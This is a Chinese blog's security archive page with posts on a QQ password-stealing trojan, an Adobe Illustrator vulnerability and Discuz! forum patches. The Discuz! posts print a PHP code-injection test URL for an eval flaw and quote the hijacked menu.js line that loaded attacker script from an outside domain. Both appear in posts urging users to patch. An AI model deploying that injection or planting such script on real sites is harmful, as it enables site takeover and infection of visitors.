Category Archives: 安全
群共享“女人必看”与“传统男人对老婆的5大不讲理”病毒
群共享“女人必看”病毒: 若不小心打开“女人必看”中的可疑程序,木马首先会显示一张美女的照片,盗号木马在后台运行,释放假的comres.dll文件替换系统文件comres.dll(系统会报告“没有找到comres.dll”),将盗取的用户QQ号和密码发到指定邮箱。然后盗号者再以你的名义登录QQ,将含有“女人必看”的压缩文件上传到所有QQ群。 金山安全专家指出,用户电脑出现comres.dll找不到,应用程序无法运行时,可能同时伴随QQ号被盗的情况,可立即使用金山网盾进行修复。金山安全专家同时建议用户应在杀毒后,立即修改QQ登录密码,QQ群管理员应立即删除群共享空间出现的可疑文件,将上传可疑文件的被盗QQ号清理出群,避免病毒进一步扩散。 PS:这病毒真是稀奇古怪,,这么具有“诱惑”性,,金山毒霸云安全中心监测到的数据表明,利用QQ群共享传播类似病毒的报告,自8月1日以来,已累计超过10万次。 相关链接: 群共享“女人必看”传病毒 一周入侵10万用户 http://www.duba.net/zt/news/2010081001.shtml
Adobe Illustrator CS4 and CS3未明缓冲区溢出漏洞
受影响版本:Adobe Illustrator CS4 (14.0.0) and Adobe Illustrator CS3 (13.0.3 及之前版本), 受影响操作系统环境:Platform: Windows 和 Macintosh 描述:Adobe Illustrator是一款adobe公司最新出品的矢量图编辑软件。 Windows和Macintosh平台上的Adobe Illustrator CS4 (14.0.0)和Adobe Illustrator CS3 (13.0.3和之前版本)存在一个严重漏洞,允许攻击者以应用程序权限执行任意指令。(The vulnerabilities could lead to arbitrary code execution. ) 解决办法:Adobe已经提供了升级补丁 1、如果正在运行Illustrator CS4,请先退出。 2、打开Illustrator CS4的安装目录并备份 < 安装路径>\Adobe Illustrator CS4\Support … Continue reading
Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)
两个重要更新补丁包 涉及版本 Discuz! 7.1 , Discuz! 7.2 Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2 本补丁包只适用于 UCenter Home 2.0 正式版 UCHome 2.0 正式版 20100106补丁包 从sebug获知,discuz 1.0最近爆出一个跨站漏洞和一个注入漏洞,另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞(上边的补丁包中已经修复)。uchome在特定php环境配置(register_globals为on)下存在一个注入漏洞。 Discuz! 7.1 & 7.2 远程代码执行漏洞细节 Discuz!新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化,可以任意提交,从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。 漏洞利用原理 showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。 简单的检测是否漏洞存在 注册一个用户登陆,然后提交 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} … Continue reading
借助Browser Defender查看邻居是否危险
今天查看邮件,发觉两个挺有意思的“Alerts”发来的Mail: 第一个,内容为 杂碎1:借助Browser Defender查看邻居是否危险 Browser Defender™ – Report for clin003.com Browser Defender evaluates web sites for malicious downloads, exploits, phishing , annoyances such as excessive pop-ups, and other fraudulent practices. 点进去一看,原来是PCtools的Browser Defender对这个博客的检测结果页面,很好,很安全。:) We have assessed this site and in our … Continue reading
今日杂碎:预设QQ第二代密码保护结果
恭喜您,您QQ号码[*******]已经正式获得第二代密码保护!马上到这里体验新的保护功能吧! 。。。 不容易啊,而且这次申请还不到一星期就ok啦(以前都是3个月的观察期!!,而且结果都是没通过考验,第二代密码保护申请失败)! 关于QQ的其他链接: QQ异常通知 http://yichang.qq.com/ QQ帐号服务中心 https://account.qq.com/ 腾讯客服 http://service.qq.com/
紧急对比更新Discuz论坛安全补丁包[20081117]
chinaz论坛爆“Discuz被挂马,受害人数三万多。官方补丁已出,赶紧打上吧 ”,补丁已出(http://download.comsenz.com/Discuz/patch/ ),不过在半小时前官方才放出来,都还在郁闷官方为啥没放补丁呢! 这次出问题的又是Wap字符转换问题,看来这个wap鸡肋可以去掉了,看官方给出的安全补丁公告: http://www.discuz.net/thread-1113736-1-1.html 经查,Discuz! wap 功能部分在对文字进行编码转换时,存在合法变量被恶意覆盖问题,此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。 * 此补丁包中含有 Discuz! 各版本程序,解开压缩包后,请根据您的版本号更新 * 本次修正不包含 Discuz! 7.0 测试版,建议参与测试的站点暂时关闭wap功能 * 如果您由于某种原因,无法及时修补,请您暂时关闭 “wap” 功能 据了解,是被修改了 menu.js document.writeln(“<script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js><\/script>”) 在某网站统计服务网站查看,截止11月17日中午,受害人数已达34713人。 下午四点左右,Discuz官方康盛技术支持提供了Disucz!安全补丁